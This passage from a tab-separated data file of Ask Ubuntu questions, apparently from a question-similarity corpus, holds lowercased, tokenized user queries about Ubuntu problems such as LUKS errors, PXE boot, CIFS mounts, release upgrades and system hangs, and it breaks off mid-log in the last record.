427012	luksformart error failed to setup dm-crypt key mapping for device	i 'm trying to format a disk with luks and when i try the command cryptsetup luksformat /dev/loop0 i put the passphrase and then this error message appear : device-mapper : reload ioctl on failed : invalid argument failed to setup dm-crypt key mapping for device /dev/loop0 . check that kernel supports aes-xts-plain64 cipher ( check syslog for more info ) . first i 've checked if i got dm-crypt loaded with : lsmod | grep crypt and got this result : crypto_user 13139 0 dm_crypt 23138 0 so i guess this is n't the problem . then i checked /proc/crypto : name : xts ( aes ) driver : xts ( aes-asm ) module : kernel priority : 200 refcnt : 1 selftest : passed type : givcipher async : no blocksize : 16 min keysize : 32 max keysize : 64 ivsize : 16 geniv : eseqiv name : xts ( aes ) driver : xts ( aes-asm ) module : kernel priority : 200 refcnt : 1 selftest : passed type : blkcipher blocksize : 16 min keysize : 32 max keysize : 64 ivsize : 16 geniv : < default > name : stdrng driver : krng module : kernel priority : 200 refcnt : 2 selftest : passed type : rng seedsize : 0 name : lzo driver : lzo-generic module : kernel priority : 0 refcnt : 1 selftest : passed type : compression name : crct10dif driver : crct10dif-generic module : kernel priority : 100 refcnt : 2 selftest : passed type : shash blocksize : 1 digestsize : 2 name : crc32c driver : crc32c-generic module : kernel priority : 100 refcnt : 2 selftest : passed type : shash blocksize : 1 digestsize : 4 name : aes driver : aes-generic module : kernel priority : 100 refcnt : 1 selftest : passed type : cipher blocksize : 16 min keysize : 16 max keysize : 32 name : sha224 driver : sha224-generic module : kernel priority : 0 refcnt : 1 selftest : passed type : shash blocksize : 64 digestsize : 28 name : sha256 driver : sha256-generic module : kernel priority : 0 refcnt : 1 selftest : passed type : shash blocksize : 64 digestsize : 32 name : sha1 driver : sha1-generic module : kernel priority : 0 refcnt : 1 selftest : passed type : shash blocksize : 64 digestsize : 20 name : md5 driver : md5-generic module : kernel priority : 0 refcnt : 1 selftest : passed type : shash blocksize : 64 digestsize : 16 name : aes driver : aes-asm module : kernel priority : 200 refcnt : 1 selftest : passed type : cipher blocksize : 16 min keysize : 16 max keysize : 32 but it seems that i got the aes that appears in the error message . anyway i tried to load aes module : modprob aes modprobe : error : could not insert 'padlock_aes ' : no such device and i saw that my hardware could n't support the aes and checked if that was true but the file exists . /lib/modules/3.13.3-201.fc20.x86_64/kernel/drivers/crypto/padlock-aes.ko so i 'm not an expert and i ca n't solve this problem and that 's why i 'm asking for your help . : )
427013	connect to locahost port failed	i 'm trying to start reddit clone local server using reddit install script on ubuntu virtual machine . during the process i have this : $ nc -vz localhost 5672 $ nc : connect to localhost port 5672 ( tcp ) failed : connection refused after that i tried $ ufw allow 5672 and checked for open ports with $ mmap localhost . though 5672 is still unavailable . i think the problem is my way of port opening . do i understand something wrong ? will be glad for any help .
427014	how to create a clone of my os ?	today i ran into a irrecoverable problem by accidentally formatting my ubuntu drive , in future i do n't want to face these kinda problems , so how can i have a clone of my os ( i mean with all the software i installed ) so that if i run into a problem i can just somehow use the clone to get back my os ? btw in another post someone mentioned remastersys , but their website says that the software will no longer be available . any related tips also might help .
427015	check if connection worked if not return error	working on a bash script to connect a iscsi client to a server . how do i put this command : iscsiadm -m discovery -t st -p 10.0.0.30 in a if to check if the connection was established , if not it will return a error . also if connection found the target will connect : iscsiadm -m node -l -t iqn.2014-02.com.example -l -p 10.0.0.30:3260
427017	mounting the image to disk	using qemu-img i converted disk as a bootable how can i mount this one to my system while i use normal mount for example mount /dev/sdb /bootable it through special disk ca n't able to mount
427023	custom keyboard shortcut for switch to specific window in unity switcher	it is possible to bind custom key for switch to specific application ? for example : super+1 switches to the chrome window ( not a first in windows list ) . super+2 switches to the nautilus window or at least : super+1 switches to first window super+2 switches to second window
427030	how do i use maas and juju with an existing dhcp server ?	i found some information about installing ubuntu with maas and juju , and i would like to try it out however i am not finding any information on how to take in to account a dhcp server already in the network . i need to be able to configure this to use the existing dhcp as it is on a router that is already working . is this possible ? i did find some information about it and how to configure it but it was for isc dhcp server . i am not sure how it will apply in this situation . but it appears that the dhcp and dns server work in tandem in order for maas and juju to work properly . does anyone know of any documentation or information i can use to work with my current dhcp server .
427037	why i can not format the partition with ubuntu ?	i have a problam with formating my ubuntu partition . i installed ubuntu yesterday , after the succesful instalation i noticed that i have lost every data on my disk . today i try to reinstall windows but i have no partition where i can reinstall it . i can not format tha partition with ubuntu and i dont know why ... when i was installing ubuntu i choosed to install it on lvm or something like this , i think that this fact have caused my problems . ps : sorry for my bad english
427038	what is wrong when i get this kind of error message all the time ?	there is a `` do not drive '' -traffic sign in the notification area in my laptop 's right corner and it shows me this error message : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/listsfi.archive.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . i 've tried maybe a hundred times to run those commands many people have sent me . ( do i have to push enter in the end ? ) thanks , but i still have n't succeeded yet . i also can not send any failure report . when i try , this error message comes out : incorrect report : package 's or source code package 's name can not be determined .
427041	problem with removing grubx64 with windows 8.1 uefi	everytime i boot up my computer i am encountered with the grub rescue shell and an error saying `` no such device xxxx-xxxxxxxxx-xxxxx-xxxxxxxx '' the windows is preinstalled and is in eufi mode most likely making this problem worse . if anyone can help me thank you in advance my computer is hp envy m6 1125dx 8gb ram edit : figured out that all my partitions are gpt , i almost sure that it has to be mbr for boot-rec to work ( bootrec /fixmbr )
427043	enable trim on the windows partitions ?	do i need to enable trim for the windows 8.1 partition on my dual boot ultrabook if i will be reading/writing to the windows partition while booted into ubuntu ? also do i need to enable it for a shared ntfs partition that i have in which i store files that i want to access from within windows and ubuntu ? thanks in advance .
427044	mounting cifs drive gives : mount error ( 22 ) : invalid argument	i 'm trying to run : sudo mount -t cifs //user.my-backup.com /mnt/wal_drive -o iocharset=utf8 , rw , credentials=/etc/backupcredentials.txt , uid=postgres , gid=postgres , file_mode=0660 , dir_mode=0770 however i keep on getting the following error : mount error ( 22 ) : invalid argument refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) what am i doing wrong ?
427047	startup script for pxeboot	i am working on pxeboot . now i want to do startup script in pxeboot server and whenever client started the startup script will run on the client machine . how to do that . ?
427051	monitor stays black after plugging it in	i am running ubuntu 12.04 on a pc using lightdm . when i have the monitor plugged in from the start the system boots just fine and everything works as expected . when i plug off the monitor , the system is still working fine ( it is reacting to keyboard and mouse input - i tested it playing some music ) . once i plug it in again , the system seems to be in a frozen state , showing only a black screen but i can still move and see the mouse . i can actually right click and the right click menu pops up as if i clicked on the desktop . i can also go to the `` change desktop background '' menu , but everything is really slow and except of the newly drawn dialogs/windows , everything else still stays black . i can still switch to any virtual terminal ( ctrl+alt+f1-f6 ) but switching back ( ctrl+alt+f7 ) results again in a black screen and only the mouse pointer . neither the xorg.0.log nor the lightdm/lightdm.log file contains anything suspicious . ( i can post it if it is of interest ) . running sudo restart lightdm will get me back to the login screen and everything is working well again - except all programs that ran before are gone . how can i either prevent the black screen issue , or alternatively jump right back into my session - i have programs running that should n't be interrupted or restarted by this .
427052	ca n't download chromium browser	i 'm trying to download chromium web browser but i 'm getting this error message below , any help ?
427053	pxeboot multiple image	how to do the multiple os in a single pxeboot server . i want to boot different os like fedora , centos , rhel in the client
427054	pc system status bios visible through shell ?	i am looking to view some settings that are visible through the bios in the command line . our system has a built in holdup charge ( shows susv status in bios ) that i would like to poll regularly for a safe shutdown when the caps are discharging on a power loss . i have dabbled with sensors -detect and only am able to see the cpu temperatures ... but the bios shows quite an extensive list of items visible in the pc health section . the susv states the holdup charge % and its status , so : susv 100 % /charged susv 50 % /discharging this is what i need to read ... any ideas to make this visible in the shell and/or through c/c++ would be greatly appreciated !
427056	cctv server load ( zoneminder )	i 've built a server for cctv with zoneminder . orwell is a pentium 4 ( prescott ) with hyperthreading , running ubuntu server 12.04 lts , 2gib ram and a 40gb ide hard drive . all he does is serve live feeds once per second from two cameras . this is a headless machine , which i connect to occasionally via putty ( ssh ) to check the load , which averages between 1.0 and 1.5 - is this a 'normal ' load ? he seems quite happy to sit there serving camera feeds , so i 'm inclined to leave him alone system information as of thu feb 27 13:25:59 gmt 2014 system load : 1.49 processes : 104 usage of / : 7.3 % of 34.62gb users logged in : 0 memory usage : 11 % ip address for eth0 : 192.168.0.99 swap usage : 0 % any advice on how i can reduce the number of processes and load as much as possible , since zoneminder is his only purpose ? thanks in advance for your suggestions : - ) edit : i did top -n 1 -b > top-output.txt and here 's the resulting output , which does n't reveal any reason why load is so high : top - 14:22:37 up 17:27 , 1 user , load average : 0.13 , 0.20 , 0.22 tasks : 104 total , 1 running , 103 sleeping , 0 stopped , 0 zombie cpu ( s ) : 7.6 % us , 0.2 % sy , 0.0 % ni , 91.9 % id , 0.2 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 2030228k total , 728024k used , 1302204k free , 122068k buffers swap : 2062332k total , 0k used , 2062332k free , 367552k cached pid user pr ni virt res shr s % cpu % mem time+ command 1742 www-data 20 0 169m 51m 42m s 16 2.6 90:19.25 zmc 3238 www-data 20 0 164m 46m 37m s 4 2.4 2:49.69 nph-zms 3237 www-data 20 0 139m 21m 14m s 2 1.1 0:14.89 nph-zms 3828 www-data 20 0 164m 38m 29m s 2 2.0 0:45.17 nph-zms 1 root 20 0 3672 1976 1244 s 0 0.1 0:01.14 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:05.44 ksoftirqd/0 5 root 0 -20 0 0 0 s 0 0.0 0:00.00 kworker/0:0h 7 root rt 0 0 0 0 s 0 0.0 0:00.01 migration/0 8 root 20 0 0 0 0 s 0 0.0 0:00.00 rcu_bh 9 root 20 0 0 0 0 s 0 0.0 0:02.92 rcu_sched 10 root rt 0 0 0 0 s 0 0.0 0:00.27 watchdog/0 11 root rt 0 0 0 0 s 0 0.0 0:00.22 watchdog/1 12 root rt 0 0 0 0 s 0 0.0 0:00.01 migration/1 13 root 20 0 0 0 0 s 0 0.0 0:33.70 ksoftirqd/1 14 root 20 0 0 0 0 s 0 0.0 0:00.00 kworker/1:0 15 root 0 -20 0 0 0 s 0 0.0 0:00.00 kworker/1:0h 16 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper 17 root 20 0 0 0 0 s 0 0.0 0:00.00 kdevtmpfs 18 root 0 -20 0 0 0 s 0 0.0 0:00.00 netns 19 root 0 -20 0 0 0 s 0 0.0 0:00.00 writeback 20 root 0 -20 0 0 0 s 0 0.0 0:00.00 kintegrityd 21 root 0 -20 0 0 0 s 0 0.0 0:00.00 bioset 22 root 0 -20 0 0 0 s 0 0.0 0:00.00 kworker/u5:0 23 root 0 -20 0 0 0 s 0 0.0 0:00.00 kblockd 24 root 0 -20 0 0 0 s 0 0.0 0:00.00 ata_sff 25 root 20 0 0 0 0 s 0 0.0 0:00.00 khubd 26 root 0 -20 0 0 0 s 0 0.0 0:00.00 md 27 root 0 -20 0 0 0 s 0 0.0 0:00.00 devfreq_wq 28 root 20 0 0 0 0 s 0 0.0 0:07.11 kworker/0:1 29 root 20 0 0 0 0 s 0 0.0 0:09.42 kworker/1:1 30 root 20 0 0 0 0 s 0 0.0 0:00.02 khungtaskd 31 root 20 0 0 0 0 s 0 0.0 0:00.00 kswapd0 32 root 25 5 0 0 0 s 0 0.0 0:00.00 ksmd 33 root 39 19 0 0 0 s 0 0.0 0:00.00 khugepaged 34 root 20 0 0 0 0 s 0 0.0 0:00.00 fsnotify_mark 35 root 20 0 0 0 0 s 0 0.0 0:00.00 ecryptfs-kthrea 36 root 0 -20 0 0 0 s 0 0.0 0:00.00 crypto 48 root 0 -20 0 0 0 s 0 0.0 0:00.00 kthrotld 51 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_0 52 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_1 55 root 0 -20 0 0 0 s 0 0.0 0:00.00 dm_bufio_cache 75 root 0 -20 0 0 0 s 0 0.0 0:00.00 deferwq 76 root 0 -20 0 0 0 s 0 0.0 0:00.00 charger_manager 221 root 20 0 0 0 0 s 0 0.0 0:02.64 jbd2/sda1-8 and the output from ps -ashuxk % cpu |tail -n 10 ... rufus @ orwell : ~ $ ps -ahuxk % cpu |tail -n 10 warning : bad ps syntax , perhaps a bogus '- ' ? see http : //procps.sf.net/faq.html www-data 3832 0.1 0.3 35724 7460 ? s 13:44 0:05 /usr/sbin/apache2 -k start www-data 3150 0.2 0.4 37252 8968 ? s 13:13 0:09 /usr/sbin/apache2 -k start www-data 3216 0.3 1.1 144408 24048 ? s 13:15 0:13 /usr/bin/zmc -d /dev/video1 www-data 3827 0.3 1.0 142508 22240 ? s 13:44 0:09 /usr/lib/cgi-bin/nph-zms www-data 3237 0.3 1.0 142508 22240 ? s 13:15 0:16 /usr/lib/cgi-bin/nph-zms root 4129 0.6 0.1 10032 3332 ? ss 14:28 0:00 sshd : rufus [ priv ] www-data 3828 1.9 2.1 167956 43360 ? s 13:44 0:52 /usr/lib/cgi-bin/nph-zms www-data 3238 4.2 2.3 167956 47844 ? s 13:15 3:03 /usr/lib/cgi-bin/nph-zms www-data 1742 8.9 2.6 173796 53212 ? s feb26 91:13 /usr/bin/zmc -d /dev/video0 rufus 4261 11.3 0.2 9716 6000 pts/0 ss 14:28 0:00 -bash
427059	upgrading a eol kubuntu box with lxde from 10.10 to 12.04	i actually joined ask ubuntu to answer a question that i had found an answer to but , unfortunately , i 'm too new to do that ... so i thought that i would post my experiences and share what i learned in case there is someone else out there who needs to google as much as i did to achieve something similar . needless to say , this is n't really a question but being a noob it is all i seem able to do . upgrading upgrading takes a long time . going from 10.10 to 12.04 took me a day ( including all my googling and problem solving ) . upgrading to another eol distribution was different to upgrading to an active distribution ( precise/12.04 ) so i 'll approach them in turn . upgrading to another eol distribution for eol distributions the repositories list in /etc/apt/sources.list needs to be updated edit /etc/apt/sources.list ( i use edit as an alias for my favourite editor ) to contain : deb http : //old-releases.ubuntu.com/ubuntu/ codename main restricted universe multiverse deb http : //old-releases.ubuntu.com/ubuntu/ codename-updates main restricted universe multiverse deb http : //old-releases.ubuntu.com/ubuntu/ codename-security main restricted universe multiverse codename needs to be replaced with the name of your eol distribution . e.g . maverick . natty , oneiric etc . in all my googling , no one ever said how many repositories should be referenced so i only ever listed the repositories for my current version and for my next version . i ca n't attribute any of the problems i encountered to this . commands for upgrading next , the following commands are all that i needed . sometimes it would look like i had entered dependency hell but the answer was always straight forward ( see below ) . to keep this short , i wo n't explain each command here . apt-get clean apt-get update apt-get -f dist-upgrade apt-get -f install dpkg -- configure -a apt-get autoremove to view your ubuntu version : lsb_release -a of course , not one upgrade went smoothly so those were n't the only commands i had to use and i had to use some of them many times to get through each upgrade . however , it is important to note that when i had issues that i had to google , it was mostly these commands that i kept coming back to in order to solve them . encountered problems the unpacking problem if you get a dpkg error that says `` trying to overwrite '' like this one ( this was n't mine ) unpacking replacement smplayer ... dpkg : error processing /var/cache/apt/archives/smplayer_0.6.9+svn3595-1ppa1~maverick1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/smplayer/translations/smplayer_eu.qm ' , which is also in package smplayer-translations 0.6.9-1 dpkg-deb : subprocess paste killed by signal ( broken pipe ) the solution is to manually -- force-overwrite the package extraction . dpkg -i -- force-overwrite /var/cache/apt/archives/smplayer_0.6.9+svn3595-1ppa1~maverick1_i386.deb can not remove errors most of these can be done manually . they are n't exactly critical but i did them anyway to keep the output of my upgrade commands simple . 11.10 dependency hell after upgrading to 11.10 i had a few circular dependency issues that were n't going away and i could n't solve them with my apt-get or dpkg commands as i had on previous occasions and nothing else was working so i just gave up and hoped that a `` do-release-upgrade '' to 12.04 would solve them ( which it did ) . upgrading to an active distribution 12.04 the final upgrade for me was to go to precise ( 12.04 ) . sources list first , i had messed up my sources list so i needed to rebuild it for the upgrade to 12.04 . i used the ubuntu sources list generator to do this and selected everything . perhaps this was n't the best of ideas but it worked out . the first four lines i was given were : deb http : //uk.archive.ubuntu.com/ubuntu/ precise-security deb http : //uk.archive.ubuntu.com/ubuntu/ precise-updates deb http : //uk.archive.ubuntu.com/ubuntu/ precise-proposed deb http : //uk.archive.ubuntu.com/ubuntu/ precise-backports apt-get did n't like these so i added `` main restricted universe multiverse '' to each of them . deb http : //uk.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb http : //uk.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb http : //uk.archive.ubuntu.com/ubuntu/ precise-proposed main restricted universe multiverse deb http : //uk.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse that worked but i could n't upgrade with apt-get as i had before because of the dependency hell that i was in so i just did do-release-upgrade and everything turned out ok . it took over 2 hours to finish though which was a very long time compared to the other upgrades . after all that after all that , i have no dependency issues and i did n't even have my normal apră¨s upgrade desktop issues . in fact , there were only two issues with the desktop . i find this simply astounding as i have always had tons of issues after previous upgrades . no audio this is not an unusual problem for me after an upgrade and it is always difficult to track down . however this time i noticed that 12.04 uses pulseaudio so i installed pavucontrol . apt-get install pavucontrol i then ran it from the desktop run box by simply entering pavucontrol all i had to do was unmute the audio and move the sliders for left and right output and voilă . my computer has never been so loud . no auto login i have n't solved this one yet . i have raised a question for it though .
427060	sound difficulties with ubuntu 12.04	sound stops seemingly random . i am able to restart it after i return from suspended mode or if i plug/unplug my charger , but it stops again after a while and i have to restart it again ... does anyone know what i should do ? i am using an asus k52f and my ubuntu is installed from windows . i will supply further information if anyone is kind enough to help me : d
427061	how can i enable java on google chrome ?	java is not working on google chrome in ubuntu 12.04 . how can i enable it ?
427063	how to remove my first ubuntu because my computer has two ubuntus	my computer has three operating systems : windows 7 and two ubuntu 13.10 . trying to explain : first of all , when i bought this computer , a dell inspiron , windows 7 was incorporated . some years later i downloaded the image 13.04 from www.ubuntu.com ; as per its instructions i burned the iso on a dvd . by means of the bios the machine starts by the disk before the hard disk . then , actually , when starting the computer appears a grub and anybody can choose either ubuntu or windows 7 . certainly ubuntu was upgraded into 13.10 . from www.ubuntu.cat i roughly did the same procedure but in windows 7 i may select windows or ubuntu ( wubi ) . at this point i would like to remove the first ubuntu . how to do this ?
427065	software center not working on start up	i 'm using ubuntu 12.10 and software center do n't work after startup and error message appear , the message content : e : problem with mergelist /var/lib/apt/lists/kw.archive.ubuntu.com_ubuntu_dists_quantal_main_i18n_translation-en e : the package lists or status file could not be parsed or opened .
427066	creating executable file with password included in a script	how can i execute a sudo command by double clicking an icon ( password should be part of the script ) . please help ! excuse if question is a blunder . my gnome-ppp is not detecting my bsnl modem when i run w/o sudo command . i would like to make a executable file for the sudo command sudo gnome-ppp .
427071	resolution problem 1366x768 in ubuntu 12.04	my resolution is 1366x768 but i get only these 4 options : 1280 x 1024 1024 x 768 800 x 600 640 x 400 . i have tried using xrandr but i get the following error : '' xrandr : failed to get size of gamma for output default '' is there another software for changing the resolution ? and can it get resolved if i upgrade from 12.04 to 12.10 ? problem is only with ubuntu , windows is okay .
427072	ubuntu software center not detecting modem	ubuntu software center is not detecting the internet connection of my bsnl cdma modem . the install icon is not visible in the app . it is visible when i connect through eth0 and wlan0 but not through ppp0 . i am able to install application using apt-get install command . is there any way that ppp0 could be detected by usc .
427074	ca n't login ubuntu 12.4 lts	i use ubuntu 12.4lts . when i was logged with the admin account , i used exit x command to restart my computer . now i ca n't log in again even with the right password .
427078	using ubuntu compoments on other systems	i 'm working on an music player for touch screens . i would really love to have it looking and working natively on ubuntu touch . at the same time i do n't want to break compatibility with other systems . what are the suggestions to do it ? i could reimplement all the ubuntu components and functions by myself but this certainly is n't the correct way . also i am developing it mostly on a windows pc . what would you suggest to do ?
427080	getting mtp-enabled moto g to work with ubuntu 12.04	i 'm not allowed to comment , so i ca n't ask why my motog phone wo n't connect with my ubuntu 12.04 64bit desktop . i 've installed phillip langdale 's ppa & packages for gvfs mtp backend . it did n't pickup my phone when connected by usb . so i followed the advice ( given by @ glutanimate ) in : getting mtp enabled devices to work with ubuntu ? i.e . i downloaded & installed the referred-to mtp packages . still no success . ideas please .
427081	my encfs folder three times larger than original	recently i 've noticed sudden grown of size of my encfs folder . size of data 2.3 gb , size of encfs folder is 6.6 gb . what could cause this ? this is how mount output looks like : /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=user ) encfs on /home/user/data type fuse.encfs ( rw , nosuid , nodev , default_permissions , user=user ) encfs on /home/user/lab type fuse.encfs ( rw , nosuid , nodev , default_permissions , user=user )
427083	run eclipse project as root without running eclipse as root	how can one execute eclipse project as root without running eclipse as root ? i 'm writing a c++ program that uses opencv and boost libraries . when trying to execute the program , i get the following error : bind : permission denied i 've read that running eclipse as root is not a good idea , to say the least . any help would be appreciated .
427084	how to compile bison from source ?	i tried to install bison according to the instructions . when i configure the source code with ./configure in my directory : ~/lcu1/bison-3.0 $ the error message below appears : checking for gnu m4 that supports accurate traces ... configure : error : no acceptable m4 could be found in $ path . gnu m4 1.4.6 or later is required ; 1.4.16 or newer is recommended . gnu m4 1.4.15 uses a buggy replacement strstr on some systems . glibc 2.9 - 2.12 and gnu m4 1.4.11 - 1.4.15 have another strstr bug . though i have already included m4 in my path variable with path= $ path : /home/lcu1/m4-1.4.17/bin . however , i can not find a folder named /bin in /m4-1.4.17 in the file manager .
427085	how can system monitor display disk io ?	i ca n't imagine this is not possible ... . but i ca n't figure out where to enable it . ca n't system monitor ( gnome-system-monitor ) display disk io ?
427086	how do i open my downloaded program ?	i have been trying to download a program onto my new ubuntu but this message comes up over and over when i try to load the archive with the archive manager . i ca n't find a way around it . what does it mean and how do i fix the problem ? archive : /home/hans/downloads/cfw_installer_5732_83.exe [ /home/hans/downloads/cfw_installer_5732_83.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/hans/downloads/cfw_installer_5732_83.exe or /home/hans/downloads/cfw_installer_5732_83.exe.zip , and can not find /home/hans/downloads/cfw_installer_5732_83.exe.zip , period .
427093	access ubuntuone for primadesk	i want to access my ubuntuone account using the cloud management software primadesk . unfortunately , it is not included in the preset clients , but they support webdav and ftp access . how can i configure that to get my ubuntuone account included in my cloud management interface , like dropbox , gdrive and others ? i am not interested in using a separate client software for each account and i want to move files between the accounts . thanks for any helpful advice !
427105	problems after upgrading to 13.10 from 12.10	it 's my first question and i am pretty much desperate by now . so please look upon any errors likely to occur in my question . so , i had ubuntu 12.10 running alongside windows 7 ( which is the default os ) . a few months back i tried do-release-upgrade and before it finished , i aborted it . 2 days ago i ran sudo apt-get update & & sudo apt-get upgrade since software updater kept saying '' not all updates can be installed '' . so when upgrading finished , i rebooted my computer and got a total blank screen after logging in . i tried everything i could find on the net ( uninstalling and then installing lightdm again seemed somewhat to work , at least the screen was n't black anymore ) . but what came was n't much of an improvement . the dash was gone , along with the top bar . it was a total wallpaper , the whole screen . hitting ctrl+alt+f1 brought the terminal and that was the only thing that worked correctly . with that i installed compizconfig settings manager and after a lot of fooling around managed to get the dash back , but no top panel . but it was nothing near right . all open applications show a question mark instead of the app logo in the dash . the menu is always on top of every window , instead of when i hover my mouse there . what is worst about the whole thing , is that the log in screen still shows ubuntu 12.10 , even though the terminal says it 's 13.10 and running do-release-upgrade brought the message that no upgrade is available . brothers and sisters , what can be done ?
427106	ubuntu 13.10 hangs up sporadically	i am running ubuntu 13.10 ( classic unity setup ) . it hangs up sporadically without any obvious reason . the last time it hung up at 18:01 ( the clock showed this time ) . here is the logs information from /var/log/syslog around the halt time ( i was suggested to look at that ) : feb 27 13:17:01 nick-pc cron [ 2786 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) feb 27 14:17:01 nick-pc cron [ 2085 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) feb 27 15:17:01 nick-pc cron [ 24206 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) feb 27 16:17:01 nick-pc cron [ 14328 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) feb 27 16:40:21 nick-pc kernel : [ 33418.360608 ] perf samples too long ( 2506 > 2500 ) , lowering kernel.perf_event_max_sample_rate to 50000 feb 27 17:17:01 nick-pc cron [ 3869 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) feb 27 18:01:59 nick-pc kernel : [ 38318.138641 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] dma_pusher - ch 3 [ xorg [ 1086 ] ] get 0x002002b5c0 put 0x002002ebc8 ib_get 0x00000034 ib_put 0x00000035 state 0x80004861 ( err : invalid_cmd ) push 0x00502031 feb 27 18:01:59 nick-pc kernel : [ 38318.141274 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] dma_pusher - ch 3 [ xorg [ 1086 ] ] get 0x002002ebc8 put 0x002002ebc8 ib_get 0x00000034 ib_put 0x00000039 state 0x80000000 ( err : invalid_cmd ) push 0x00400040 feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : snd_pcm_avail ( ) returned a value that is exceptionally large : 2703404 bytes ( 15325 ms ) . feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : most likely this is a bug in the alsa driver 'snd_hda_intel ' . please report this issue to the alsa developers . feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : snd_pcm_dump ( ) : feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : soft volume pcm feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : control : pcm playback volume feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : min_db : -51 feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : max_db : 0 feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : resolution : 256 feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : its setup is : feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : stream : playback feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : access : mmap_interleaved feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : format : s16_le feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : subformat : std feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : channels : 2 feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ alsa-sink-vt2020 analog ] alsa-util.c : rate : 44100 feb 27 18:02:46 nick-pc pulseaudio [ 2774 ] : [ afeb 27 21:49:53 nick-pc kernel : imklog 5.8.11 , log source = /proc/kmsg started . feb 27 21:49:53 nick-pc rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.11 '' x-pid= '' 708 '' x-info= '' http : //www.rsyslog.com '' ] start any suggestion what is going on there ? update 1 : i tried running latest stable cinnamon - it hands sporadically too . i have two hdds , the first 200gb one is pretty old ( i 've used it for ~7 years already ) - at first ubuntu was there . the second one is 1tb - a fairly new one . at first i used it as mounting point for /home . recently i installed ubuntu on the 1tb hdd and run it now . both hdds are connected . it freezes when i am running ubuntu on the old hdd and the new one . update 2 : nick @ nick-pc : ~ $ lspci -nnk | grep -ia2 vga 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt218 [ geforce 210 ] [ 10de:0a65 ] ( rev a2 ) subsystem : asustek computer inc. device [ 1043:83f4 ] kernel driver in use : nouveau nick @ nick-pc : ~ $ lspci -nnk | grep -ia2 audio 00:14.2 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) [ 1002:4383 ] ( rev 40 ) subsystem : gigabyte technology co. , ltd device [ 1458 : a014 ] kernel driver in use : snd_hda_intel -- 01:00.1 audio device [ 0403 ] : nvidia corporation high definition audio controller [ 10de:0be3 ] ( rev a1 ) subsystem : asustek computer inc. device [ 1043:83f4 ] kernel driver in use : snd_hda_intel update 3 : just now it hung up again , and here what the syslog says : mar 1 17:20:52 nick-pc kernel : [ 2099.010729 ] nouveau e [ pfifo ] [ 0000:01:00.0 ] dma_pusher - ch 3 [ xorg [ 1102 ] ] get 0x002003394c put 0x0020036b44 ib_get 0x00000295 